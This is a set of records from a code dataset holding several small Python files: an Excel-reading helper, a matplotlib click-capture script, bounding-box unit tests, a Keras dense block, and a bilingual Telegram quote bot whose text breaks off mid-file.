+{"seq_id":"7484839657","text":"#######################################################\n## Author: Ashish Anand\n## Date: 15 Dec 2011\n## Intent: To read bills.xlsx and check who paid for this amount. Also perform some sanity testing\n## Requirement: Python Interpretor must be installed\n#######################################################\nfrom openpyxl.reader.excel import load_workbook\nfrom openpyxl.cell import get_column_letter\nfrom Util.Temp import MakeTempCopy\nfrom Util.Decorators import memoize\n\n@memoize\ndef LoadNonIterableWorkbook(workbookPath):\n \"\"\"Helper function to load a workbook in an iterable fashion\"\"\"\n tempCopy = MakeTempCopy(workbookPath)\n loadedWB = load_workbook(tempCopy, use_iterators= False)\n #loadedWB = load_workbook(tempCopy, use_iterators= False, data_only=True)\n return loadedWB\n\n\n@memoize\ndef LoadIterableWorkbook(workbookPath):\n \"\"\"Helper function to load a workbook in an iterable fashion\"\"\"\n tempCopy = MakeTempCopy(workbookPath)\n loadedWB = load_workbook(tempCopy, use_iterators= True)\n #loadedWB = load_workbook(tempCopy, use_iterators= True, data_only=True)\n return loadedWB\n\n\n@memoize\ndef GetColValues(workbookPath, sheetName, colID):\n \"\"\"Returns the values of a specific column as a list.\n Called as GetColValues(path, name, \"A\")\n \"\"\"\n wb = LoadNonIterableWorkbook(workbookPath)\n ws = wb.get_sheet_by_name(sheetName)\n max_row = ws.get_highest_row()\n res = ws.range('{0}1:{1}{2}'.format(colID, colID, max_row))\n return [x[0].value for x in res]\n\n@memoize\ndef VLookup(workbookPath, sheetName, lookUpValue, lookUpColumn, correspondingColumn):\n \"\"\"Looks up the lookUpValue in lookUpColumn and returns the value in that row's correspondingColumn\"\"\"\n col1Values = GetColValues(workbookPath, sheetName, lookUpColumn)\n col2Values = GetColValues(workbookPath, sheetName, correspondingColumn)\n for i, val in enumerate(col1Values):\n if val == lookUpValue:\n for i2, val2 in enumerate(col2Values):\n if i == i2:\n return val2\n return None\n\n\ndef GetCellValue(cell):\n if hasattr(cell, \"value\"):\n return cell.value\n return cell.internal_value\n\ndef GetColLetter(x):\n return get_column_letter(x)\n\nimport os\nOS_TYPE_IS_NT = os.name.lower()=='nt'\n\ndef GetRows(workbookPath, sheetName, firstRow, includeLastRow):\n wb = LoadIterableWorkbook(workbookPath)\n ws = wb.get_sheet_by_name(sheetName)\n MAX_ROW = ws.get_highest_row()\n\n if includeLastRow:\n MAX_ROW = MAX_ROW + 1\n MIN_ROW = int(firstRow)\n rowNumber = 0\n\n for row in ws.iter_rows():\n rowNumber += 1\n if rowNumber < MIN_ROW: continue #We are not reading anything before MIN_ROW. This might save us from reading couple thousand lines.\n if rowNumber >= MAX_ROW: break\n yield row\n\n return\n","repo_name":"abhigitz/tracker","sub_path":"Util/ExcelReader.py","file_name":"ExcelReader.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"25355644670","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.integrate import trapz\r\nfrom PIL import Image\r\n\r\ndef find_nearest(array,value):\r\n idx = (np.abs(array-value)).argmin()\r\n return array[idx]\r\n\r\n# Simple mouse click function to store coordinates\r\ndef onclick(event):\r\n global ix, iy\r\n ix, iy = event.xdata, event.ydata\r\n\r\n # print 'x = %d, y = %d'%(\r\n # ix, iy)\r\n\r\n # assign global variable to access outside of function\r\n global coords\r\n coords.append((ix, iy))\r\n\r\n # Disconnect after 2 clicks\r\n if len(coords) == 2:\r\n fig.canvas.mpl_disconnect(cid)\r\n plt.close(1)\r\n return\r\n\r\nim = Image.open('bird.jpg')\r\nx = np.arange(-10,10)\r\ny = x**2\r\n\r\nfig = plt.figure(1)\r\nax = plt.imshow(im)\r\n\r\ncoords = []\r\n\r\n# Call click func\r\ncid = fig.canvas.mpl_connect('button_press_event', onclick)\r\n\r\nplt.show(1)\r\n\r\na = coords[0][0].astype(int)\r\n\r\nprint ('Integral between '+ str(coords[0][0].astype(int)) +' & ' + str(coords[0][1].astype(int))+' & ' +str(coords[1][0].astype(int)) + ' & '+str(coords[1][1].astype(int)))\r\n\r\n","repo_name":"offthewallace/Summer-2017","sub_path":"figclick.py","file_name":"figclick.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"}
+{"seq_id":"14798123825","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nfrom __future__ import division\nimport unittest\n\nfrom geo2d import P\nimport geo2d\n\nclass TestOrientedBB(unittest.TestCase):\n def testBBox(self):\n pts = [P(0, 6), P(10, 6), P(0, 0), P(10, 0)]\n bbox = geo2d.OrientedBB(pts, 0)\n\n for p in bbox.getRect():\n p = geo2d.P(int(p.x), int(p.y))\n self.assert_(p in pts)\n\n def testExtra(self):\n pts = [P(0, 6), P(10, 6), P(0, 0), P(10, 0)]\n bbox = geo2d.OrientedBB(pts, 2)\n\n epts = [P(12, 8), P(-2, 7), P(-1, -2), P(12, -1)]\n for p in bbox.getRect():\n p = geo2d.P(int(p.x), int(p.y))\n self.assert_(p in epts)\n\n def testMerge(self):\n pts1 = [P(0, 6), P(10, 6), P(0, 0), P(10, 0)]\n bbox1 = geo2d.OrientedBB(pts1, 0)\n\n pts2 = [P(12, 6), P(16, 6), P(16, 0), P(12, 0)]\n bbox2 = geo2d.OrientedBB(pts2, 0)\n\n pts = [P(0, 0), P(0, 6), P(16, 0), P(16, 6)]\n box = geo2d.OrientedBB([bbox1, bbox2])\n for p in box.getRect():\n p = geo2d.P(int(p.x), int(p.y))\n self.assert_(p in pts)\n\n def testXSect(self):\n pts1 = [P(0, 6), P(10, 6), P(0, 0), P(10, 0)]\n bbox1 = geo2d.OrientedBB(pts1, 0)\n\n pts2 = [P(12, 6), P(16, 6), P(16, 0), P(12, 0)]\n bbox2 = geo2d.OrientedBB(pts2, 0)\n self.assertFalse(bbox1.xsect(bbox2))\n\n pts2 = [P(8, 6), P(16, 6), P(16, 0), P(8, 0)]\n bbox2 = geo2d.OrientedBB(pts2, 0)\n self.assertTrue(bbox1.xsect(bbox2))\n\n def testContains(self):\n pts = [P(0, 6), P(10, 4), P(0, 0), P(10, -2)]\n bbox = geo2d.OrientedBB(pts, 0)\n\n self.assertTrue(bbox.test(P(0, 0)))\n self.assertTrue(bbox.test(P(3, 3)))\n self.assertFalse(bbox.test(P(-1, 0)))\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"rbianchi66/pyqt_md","sub_path":"src/geo2d/test_bbox.py","file_name":"test_bbox.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"24606043890","text":"#!/usr/bin/env python3\n\"\"\"\nDense block\n\"\"\"\nimport tensorflow.keras as K\n\n\ndef dense_block(X, nb_filters, growth_rate, layers):\n \"\"\"\n Dense block\n \"\"\"\n initializer = K.initializers.HeNormal()\n for layer in range(layers):\n batch1 = K.layers.BatchNormalization(axis=3)(X)\n activation1 = K.layers.Activation('relu')(batch1)\n conv1 = K.layers.Conv2D(filters=(4 * growth_rate),\n kernel_size=(1, 1),\n padding='same',\n kernel_initializer=initializer)(activation1)\n batch2 = K.layers.BatchNormalization(axis=3)(conv1)\n activation2 = K.layers.Activation('relu')(batch2)\n conv2 = K.layers.Conv2D(filters=growth_rate,\n kernel_size=(3, 3),\n padding='same',\n kernel_initializer=initializer)(activation2)\n X = K.layers.concatenate([X, conv2])\n nb_filters += growth_rate\n return X, nb_filters\n","repo_name":"Luffy981/holbertonschool-machine_learning","sub_path":"supervised_learning/0x08-deep_cnns/5-dense_block.py","file_name":"5-dense_block.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"72284832720","text":"import telebot\r\nfrom telebot import TeleBot, types\r\n\r\nTOKEN = 'Your token'\r\nbot: TeleBot = telebot.TeleBot(\"Your token\")\r\n\r\n\r\n@bot.message_handler(commands=['start'])\r\ndef welcome(message):\r\n markup = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n item1 = types.KeyboardButton(\"Let's start📚\")\r\n markup.add(item1)\r\n sti = open('images/sticker.webp', 'rb')\r\n bot.send_sticker(message.chat.id, sti)\r\n bot.send_message(message.chat.id, \"Welcome, {0.first_name}!\\n\"\r\n \"I'm - {1.first_name}, quote bot.\"\r\n \"\\nI will help you by choosing a quote\".format(message.from_user, bot.get_me()),\r\n parse_mode='html', reply_markup=markup)\r\n\r\n\r\n@bot.message_handler(content_types=['text'])\r\ndef lalala(message):\r\n if message.chat.type == 'private':\r\n\r\n if message.text == 'English🇺🇸':\r\n markup_reply_english = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_english = types.KeyboardButton(text='Life')\r\n button2_english = types.KeyboardButton(text='Love')\r\n button3_english = types.KeyboardButton(text='Humor')\r\n button4_english = types.KeyboardButton(text='Success')\r\n button5_english = types.KeyboardButton(text='Money')\r\n button6_english = types.KeyboardButton(text='Inspirational')\r\n markup_reply_english.add(\r\n button1_english, button2_english, button3_english, button4_english, button5_english, button6_english)\r\n bot.send_message(message.chat.id,\r\n 'Okay, please choose your genre of quote!', reply_markup=markup_reply_english)\r\n\r\n elif message.text == 'Russian🇷🇺':\r\n markup_reply_russian = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_russian = types.KeyboardButton(text='Жизненные')\r\n button2_russian = types.KeyboardButton(text='Любовь')\r\n button3_russian = types.KeyboardButton(text='Смешные')\r\n button4_russian = types.KeyboardButton(text='Мотивирующие')\r\n button5_russian = types.KeyboardButton(text='Деньги')\r\n button6_russian = types.KeyboardButton(text='Мужественность')\r\n markup_reply_russian.add(\r\n button1_russian, button2_russian, button3_russian, button4_russian, button5_russian, button6_russian)\r\n bot.send_message(message.chat.id,\r\n 'Окей, выберите свой жанр цитаты пожалуйста!', reply_markup=markup_reply_russian)\r\n\r\n if message.text == \"Let's start📚\":\r\n markup_wel = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n item1_wel = types.KeyboardButton(text=\"English🇺🇸\")\r\n item2_wel = types.KeyboardButton(text=\"Russian🇷🇺\")\r\n markup_wel.add(item1_wel, item2_wel)\r\n bot.send_message(message.chat.id, 'Choose one language', reply_markup=markup_wel)\r\n\r\n if message.text == 'More quotes on the topic of life':\r\n bot.send_message(message.chat.id, \"“Everything you can imagine is real.”\"\r\n \"\\n\\n― Pablo Picasso\")\r\n bot.send_message(message.chat.id, \"“Life isn't about finding yourself. Life is about creating yourself.”\"\r\n \"\\n\\n― George Bernard Shaw\")\r\n bot.send_message(message.chat.id, \"“I'm not afraid of death; \"\r\n \"I just don't want to be there when it happens.”\"\r\n \"\\n\\n― Woody Allen\")\r\n bot.send_message(message.chat.id, \"“Sometimes the questions are complicated and the answers are simple.”\"\r\n \"\\n\\n― Dr. Seuss\")\r\n bot.send_message(message.chat.id, \"“Life is like riding a bicycle. 
\"\r\n \"To keep your balance, you must keep moving.”\"\r\n \"\\n\\n― Albert Einstein\")\r\n\r\n if message.text == 'Life':\r\n photo = open('images/life.jpg', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, \"“You've gotta dance like there's nobody watching,\"\r\n \"\\nLove like you'll never be hurt,\"\r\n \"\\nSing like there's nobody listening,\"\r\n \"\\nAnd live like it's heaven on earth.”\"\r\n \"\\n\\n― William W. Purkey\")\r\n bot.send_message(message.chat.id, \"“You only live once,\"\r\n \"but if you do it right,\"\r\n \"once is enough.”\"\r\n \"\\n\\n― Mae West\")\r\n bot.send_message(message.chat.id, \"“Good friends, good books, \"\r\n \"and a sleepy conscience: this is the ideal life.”\"\r\n \"\\n\\n― Mark Twain\")\r\n bot.send_message(message.chat.id, \"“Life is what happens to us while we are making other plans.”\"\r\n \"\\n\\n― Allen Saunders\")\r\n bot.send_message(message.chat.id, \"“This life is what you make it. No matter what, \"\r\n \"you're going to mess up sometimes, it's a universal truth. \"\r\n \"But the good part is you get to decide how you're going to mess it up. \"\r\n \"Girls will be your friends - they'll act like it anyway. \"\r\n \"But just remember, some come, some go. \"\r\n \"The ones that stay with you through everything \"\r\n \"- they're your true best friends. Don't let go of them. \"\r\n \"Also remember, sisters make the best friends in the world. \"\r\n \"As for lovers, well, they'll come and go too. \"\r\n \"And baby, I hate to say it, most of them - \"\r\n \"actually pretty much all of them are going to break your heart, \"\r\n \"but you can't give up because if you give up, \"\r\n \"you'll never find your soulmate. \"\r\n \"You'll never find that half who makes you whole \"\r\n \"and that goes for everything. \"\r\n \"Just because you fail once, \"\r\n \"doesn't mean \"\r\n \"you're gonna fail at everything. Keep trying, \"\r\n \"hold on, and always, always, always believe in yourself, \"\r\n \"because if you don't, then who will, sweetie? \"\r\n \"So keep your head high, keep your chin up, \"\r\n \"and most importantly, keep smiling, \"\r\n \"because life's a beautiful thing and there's so much to smile about.”\"\r\n \"\\n\\n― Marilyn Monroe\")\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='More quotes on the topic of life')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'If you want more quotes on this topic click on the \"More quotes on the topic of life\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == \"More quotes on the topic of love\":\r\n bot.send_message(message.chat.id, \"“Love is like the wind, you can't see it but you can feel it.”\"\r\n \"\\n\\n― Nicholas Sparks\")\r\n bot.send_message(message.chat.id, \"“You don't love someone because they're perfect, \"\r\n \"you love them in spite of the fact that they're not.”\"\r\n \"\\n\\n― Jodi Picoult\")\r\n bot.send_message(message.chat.id, \"“If you can make a woman laugh, you can make her do anything.”\"\r\n \"\\n\\n― Marilyn Monroe\")\r\n bot.send_message(message.chat.id, \"“I'm selfish, impatient and a little insecure. \"\r\n \"I make mistakes, I am out of control and at times hard to handle. \"\r\n \"But if you can't handle me at my worst, \"\r\n \"then you sure as hell don't deserve me at my best.”\"\r\n \"\\n\\n― Marilyn Monroe\")\r\n bot.send_message(message.chat.id, \"“Love never dies a natural death. 
\"\r\n \"It dies because we don't know how to replenish its source. \"\r\n \"It dies of blindness and errors and betrayals. \"\r\n \"It dies of illness and wounds; it dies of weariness, \"\r\n \"of witherings, of tarnishings.”\"\r\n \"\\n\\n― Anais Nin\")\r\n\r\n if message.text == \"Love\":\r\n photo = open('images/love.jpg', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, \"“You know you're in love when you can't fall asleep because \"\r\n \"reality is finally better than your dreams.”\"\r\n \"\\n\\n― Dr. Seuss\")\r\n bot.send_message(message.chat.id, \"We accept the love we think we deserve.”\"\r\n \"\\n\\n― Stephen Chbosky\")\r\n bot.send_message(message.chat.id, \"“As he read, I fell in love the way you fall asleep: \"\r\n \"slowly, and then all at once.”\"\r\n \"\\n\\n― John Green\")\r\n bot.send_message(message.chat.id, \"“Love all, trust a few, do wrong to none.”\"\r\n \"\\n\\n― William Shakespeare\")\r\n bot.send_message(message.chat.id, \"“Love is that condition in which the happiness \"\r\n \"of another person is essential to your own.”\"\r\n \"\\n\\n― Robert A. Heinlein\")\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='More quotes on the topic of love')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'If you want more quotes on this topic click on the \"More quotes on the topic of love\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == \"More quotes on the topic of humor\":\r\n bot.send_message(message.chat.id, \"“Two things are infinite: the universe and human stupidity,\"\r\n \"and I'm not sure about the universe.”\"\r\n \"\\n\\n― Albert Einstein\")\r\n bot.send_message(message.chat.id, \"Everyone is out of place! I dropped my brains.\"\r\n \"\\n\\n― Pirates of the Caribbean\")\r\n bot.send_message(message.chat.id, \"“It’s no use going back to yesterday, \"\r\n \"because I was a different person then.”\"\r\n \"\\n\\n― Lewis Carroll\")\r\n bot.send_message(message.chat.id, \"“Be nice to nerds. You may end up working for them. We all could.”\"\r\n \"\\n\\n― Charles J. Sykes\")\r\n bot.send_message(message.chat.id, \"Everyone is out of place! I dropped my brains.\"\r\n \"\\n\\n― Pirates of the Caribbean\")\r\n bot.send_message(message.chat.id, \"“So many books, so little time.”\"\r\n \"\\n\\n― Frank Zappa\")\r\n\r\n if message.text == \"Humor\":\r\n sti = open('images/humor.webp', 'rb')\r\n bot.send_sticker(message.chat.id, sti)\r\n bot.send_message(message.chat.id, \"There are people who just want to approach and \"\r\n \"ask if it is difficult to live without brains.\"\r\n \"\\n\\n― Faina Ranevskaya\")\r\n bot.send_message(message.chat.id, \"“I love mankind ... it's people I can't stand!!”\"\r\n \"\\n\\n― Charles M. Schulz\")\r\n bot.send_message(message.chat.id, \"— Shut up.\"\r\n \"\\n— I didn't say anything.\"\r\n \"\\n— You were thinking. It's annoying.\"\r\n \"\\n\\n Sherlock― \")\r\n bot.send_message(message.chat.id, \"“Have no fear of perfection - you'll never reach it.”\"\r\n \"\\n\\n― Salvador Dali\")\r\n bot.send_message(message.chat.id, \"Theory is when you know everything and nothing works, \"\r\n \"practice is when everything works and nobody knows why. 
\"\r\n \"Here we combine theory with practice: \"\r\n \"nothing works and nobody knows why.\"\r\n \"― Albert Einstein\")\r\n markup_reply_humor = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_humor = types.KeyboardButton(text='More quotes on the topic of humor')\r\n markup_reply_humor.add(button1_humor)\r\n bot.send_message(message.chat.id,\r\n 'If you want more quotes on this topic click on the \"More quotes on the topic of humor\"',\r\n reply_markup=markup_reply_humor)\r\n\r\n if message.text == \"More quotes on the topic of success\":\r\n bot.send_message(message.chat.id, \"“Success is getting what you want, happiness is wanting what you get”\"\r\n \"\\n\\n― W. P. Kinsella\")\r\n bot.send_message(message.chat.id, \"“Failure is the condiment that gives success its flavor.”\"\r\n \"\\n\\n― Truman Capote\")\r\n bot.send_message(message.chat.id, \"“Have no fear of perfection - you'll never reach it.”\"\r\n \"\\n\\n― Salvador Dali\")\r\n bot.send_message(message.chat.id, \"Success is stumbling from failure to \"\r\n \"failure with no loss of enthusiasm.”\"\r\n \"\\n\\n― Winston S. Churchill\")\r\n bot.send_message(message.chat.id, \"“Don't spend time beating on a wall, \"\r\n \"hoping to transform it into a door. ”\"\r\n \"\\n\\n― Coco Chanel\")\r\n\r\n if message.text == \"Success\":\r\n photo = open('images/success.webp', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, \"“Success is not final, failure is not fatal: \"\r\n \"it is the courage to continue that counts.”\"\r\n \"\\n\\n― Winston S. Churchill\")\r\n bot.send_message(message.chat.id, \"“I can't give you a sure-fire formula for success, \"\r\n \"but I can give you a formula for failure: \"\r\n \"try to please everybody all the time.”\"\r\n \"\\n\\n― Herbert Bayard Swope\")\r\n bot.send_message(message.chat.id, \"“If at first you don't succeed, try, try again. \"\r\n \"Then quit. No use being a damn fool about it.”\"\r\n \"\\n\\n― W.C. Fields\")\r\n bot.send_message(message.chat.id, \"“Try not to become a man of success. Rather become a man of value.”\"\r\n \"\\n\\n― Albert Einstein\")\r\n bot.send_message(message.chat.id, \"“It is better to fail in originality than to succeed in imitation.”\"\r\n \"\\n\\n― Herman Melville\")\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='More quotes on the topic of success')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'If you want more quotes on this topic click on the \"More quotes on the topic of success\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == \"More quotes on the topic of money\":\r\n bot.send_message(message.chat.id, \"“Too many people spend money they haven't earned, \"\r\n \"to buy things they don't want, \"\r\n \"to impress people that they don't like.”\"\r\n \"\\n\\n― Will Rogers\")\r\n bot.send_message(message.chat.id, \"“Libraries will get you through times of no money better\"\r\n \" than money will get you through times of no libraries.”\"\r\n \"\\n\\n― Anne Herbert\")\r\n bot.send_message(message.chat.id, \"“Making money isn't hard in itself... 
\"\r\n \"What's hard is to earn it doing something \"\r\n \"worth devoting one’s life to.”\"\r\n \"\\n\\n― Carlos Ruiz Zafón\")\r\n bot.send_message(message.chat.id, \"“The hardest thing in the world to understand is the income tax.”\"\r\n \"\\n\\n― Albert Einstein\")\r\n bot.send_message(message.chat.id, \"“Money may not buy happiness, \"\r\n \"but I'd rather cry in a Jaguar than on a bus.”\"\r\n \"\\n\\n― Françoise Sagan\")\r\n\r\n if message.text == \"Money\":\r\n photo = open('images/money.webp', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, \"“Anyone who lives within their means \"\r\n \"suffers from a lack of imagination.”\"\r\n \"\\n\\n― Oscar Wilde\")\r\n bot.send_message(message.chat.id, \"“Everyone wants to ride with you in the limo, \"\r\n \"but what you want is someone who will take \"\r\n \"the bus with you when the limo breaks down.”\"\r\n \"\\n\\n― Oprah Winfrey\")\r\n bot.send_message(message.chat.id, \"“A Penny Saved is a Penny Earned”\"\r\n \"\\n\\n― Benjamin Franklin\")\r\n bot.send_message(message.chat.id, \"“Wealth consists not in having great possessions, \"\r\n \"but in having few wants.”\"\r\n \"\\n\\n― Epictetus\")\r\n bot.send_message(message.chat.id, \"“While money can't buy happiness, \"\r\n \"it certainly lets you choose your own form of misery.”\"\r\n \"\\n\\n― Groucho Marx\")\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='More quotes on the topic of money')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'If you want more quotes on this topic click on the \"More quotes on the topic of money\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == \"More quotes on the topic of Inspirational\":\r\n bot.send_message(message.chat.id, \"“You never have to change anything \"\r\n \"you got up in the middle of the night to write.”\"\r\n \"\\n\\n― Saul Bellow\")\r\n bot.send_message(message.chat.id, \"“The unexamined life is not worth living.”\"\r\n \"\\n\\n― Socrates\")\r\n bot.send_message(message.chat.id, \"“Pain is temporary. Quitting lasts forever.”\"\r\n \"\\n\\n― Lance Armstrong Sally Jenkins\")\r\n bot.send_message(message.chat.id, \"“I was never really insane except \"\r\n \"upon occasions when my heart was touched.”\"\r\n \"\\n\\n― Edgar Allan Poe\")\r\n bot.send_message(message.chat.id, \"“Don't be pushed around by the fears in your mind. \"\r\n \"Be led by the dreams in your heart.”\"\r\n \"\\n\\n― Roy T. Bennett\")\r\n\r\n if message.text == \"Inspirational\":\r\n photo = open('images/Inspirational.webp', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, \"“Do one thing every day that scares you.”\"\r\n \"\\n\\n― Eleanor Roosevelt\")\r\n bot.send_message(message.chat.id, \"“We are what we pretend to be, \"\r\n \"so we must be careful about what we pretend to be.”\"\r\n \"\\n\\n― Kurt Vonnegut\")\r\n bot.send_message(message.chat.id, \"“Sometimes you wake up. Sometimes the fall kills you. 
\"\r\n \"And sometimes, when you fall, you fly.”\"\r\n \"\\n\\n― Neil Gaiman, Fables & Reflections\")\r\n bot.send_message(message.chat.id, \"“What's meant to be will always find a way”\"\r\n \"\\n\\n― Trisha Yearwood\")\r\n bot.send_message(message.chat.id, \"“The flower that blooms in adversity \"\r\n \"is the rarest and most beautiful of all.”\"\r\n \"\\n\\n― Walt Disney Company\")\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='More quotes on the topic of Inspirational')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'If you want more quotes on this topic click on the \"More quotes on the topic '\r\n 'of Inspirational\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == 'Больше цитат':\r\n bot.send_message(message.chat.id, 'Не совершай классическую ошибку всех умников: не думай, '\r\n 'что нет людей умнее тебя.'\r\n '\\n\\n- Области тьмы')\r\n bot.send_message(message.chat.id, '— Это не ответ.'\r\n '— Нет, это ответ. Просто это не то, что вы хотите услышать.'\r\n '\\n\\n- Неадекватные люди')\r\n bot.send_message(message.chat.id, 'Денег, которые я заработал, хватит мне до конца жизни, '\r\n 'если я умру сегодня в 16.00.'\r\n '\\n\\n- Хенни Янгман')\r\n bot.send_message(message.chat.id, 'Иногда момент, который ты так долго ждал, '\r\n 'приходит в самое неподходящее время...'\r\n '\\n\\n- Клиника')\r\n bot.send_message(message.chat.id, 'Ничто так не выдает человека, как то, над чем он смеётся.'\r\n '\\n\\n- Иоганн')\r\n\r\n if message.text == 'Жизненные':\r\n photo = open('images/life.jpg', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, 'Проще расстаться с человеком, чем с иллюзиями на его счёт.'\r\n '\\n\\n- Марта Кетро')\r\n bot.send_message(message.chat.id, 'Такой вот парадокс: мы совершаем подвиги для тех, '\r\n 'кому до нас уже нет никакого дела, а любят нас те, '\r\n 'кому мы нужны и без всяких подвигов...'\r\n '\\n\\n- Смешарики')\r\n bot.send_message(message.chat.id, 'Самое худшее, когда нужно ждать и не можешь ничего сделать. '\r\n 'От этого можно сойти с ума.'\r\n '\\n\\n- Эрих Мария Ремарк')\r\n bot.send_message(message.chat.id, 'Сильные люди не любят свидетелей своей слабости.'\r\n '\\n\\n- Маргарет Митчел')\r\n bot.send_message(message.chat.id, 'Как же неприятно потратить на человека так '\r\n 'много времени лишь для того, чтобы узнать,'\r\n ' что он так и остался для тебя лишь посторонним.'\r\n '\\n\\n- Вечное сияние чистого разума')\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='Больше цитат')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'Если хотите больше цитат, то нажмите на '\r\n '\"Больше цитат\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == 'Любовь':\r\n photo = open('images/love.jpg', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, 'Если человек умер, его нельзя перестать любить, черт возьми. '\r\n 'Особенно если он был лучше всех живых, понимаешь?'\r\n '\\n\\n- Джером Дэвид')\r\n bot.send_message(message.chat.id, 'У самого злого человека расцветает лицо, когда ему говорят, '\r\n 'что его любят. Стало быть, в этом счастье...'\r\n '\\n\\n- Лев Николаевич Толстой')\r\n bot.send_message(message.chat.id, 'Кому-то не хватает одной женщины, '\r\n 'и он переключается на пятую, десятую. 
'\r\n 'А другому не хватает жизни, чтобы любить одну-единственную.'\r\n '\\n\\n- Константин Хабенский')\r\n bot.send_message(message.chat.id, 'Влюбиться можно в красоту, но полюбить – лишь только душу!'\r\n '\\n\\n- Уильям Шекспир')\r\n bot.send_message(message.chat.id, 'В идеальных отношениях чистая любовь и грязный секс дополняют, '\r\n 'а не исключают друг друга.'\r\n '\\n\\n- Брайанна Рид')\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='Больше цитат')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'Если хотите больше цитат, то нажмите на '\r\n '\"Больше цитат\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == 'Смешные':\r\n photo = open('images/humor.webp', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, 'Теория — это когда все известно, но ничего не работает.'\r\n ' Практика — это когда все работает, но никто не знает почему. '\r\n 'Мы же объединяем теорию и практику: ничего не работает... '\r\n 'и никто не знает почему!'\r\n '\\n\\n- Альберт Эйнштейн')\r\n bot.send_message(message.chat.id, 'Есть такие люди, к которым просто хочется подойти и'\r\n ' поинтересоваться, сложно ли без мозгов жить.'\r\n '\\n\\n- Фаина Раневская')\r\n bot.send_message(message.chat.id, 'Все это видели?! Ибо я отказываюсь это повторять!'\r\n '\\n\\n- Капитан Джек Воробей')\r\n bot.send_message(message.chat.id, 'Меня вообще-то сложно удивить... О! Синяя машина!'\r\n '\\n\\n- Симпсоны')\r\n bot.send_message(message.chat.id, '— О, Господи!..'\r\n '\\n— Зови меня просто Дин.'\r\n '\\n\\n- Дин Винчестер')\r\n markup_reply_life = types.ReplyKeyboardMarkup(resize_keyboard=True)\r\n button1_life = types.KeyboardButton(text='Больше цитат')\r\n markup_reply_life.add(button1_life)\r\n bot.send_message(message.chat.id,\r\n 'Если хотите больше цитат, то нажмите на '\r\n '\"Больше цитат\"',\r\n reply_markup=markup_reply_life)\r\n\r\n if message.text == 'Мотивирующие':\r\n photo = open('images/Inspirational.webp', 'rb')\r\n bot.send_photo(message.chat.id, photo)\r\n bot.send_message(message.chat.id, 'Обязательно дружите с теми, кто лучше вас.'\r\n ' Будете мучиться, но расти.'\r\n '\\n\\n- Вера Полозкова')\r\n bot.send_message(message.chat.id, 'Столько есть всего, о чём надо подумать. '\r\n 'Зачем забивать себе голову тем, чего уже не вернёшь, '\r\n '— надо думать о том, что ещё можно изменить.'\r\n '\\n\\n- Скарлетт')\r\n bot.send_message(message.chat.id, 'Если ты плачешь не от счастья, то перестань.'\r\n '\\n\\n- Футурама')\r\n bot.send_message(message.chat.id, 'Все, что делаешь, надо делать хорошо, даже если совершаешь'\r\n ' безумство.'\r\n '\\n\\n- Оноре Де Бальзак')\r\n bot.send_message(message.chat.id, 'Ты — это то, что ты делаешь. '\r\n 'Ты — это твой выбор. 
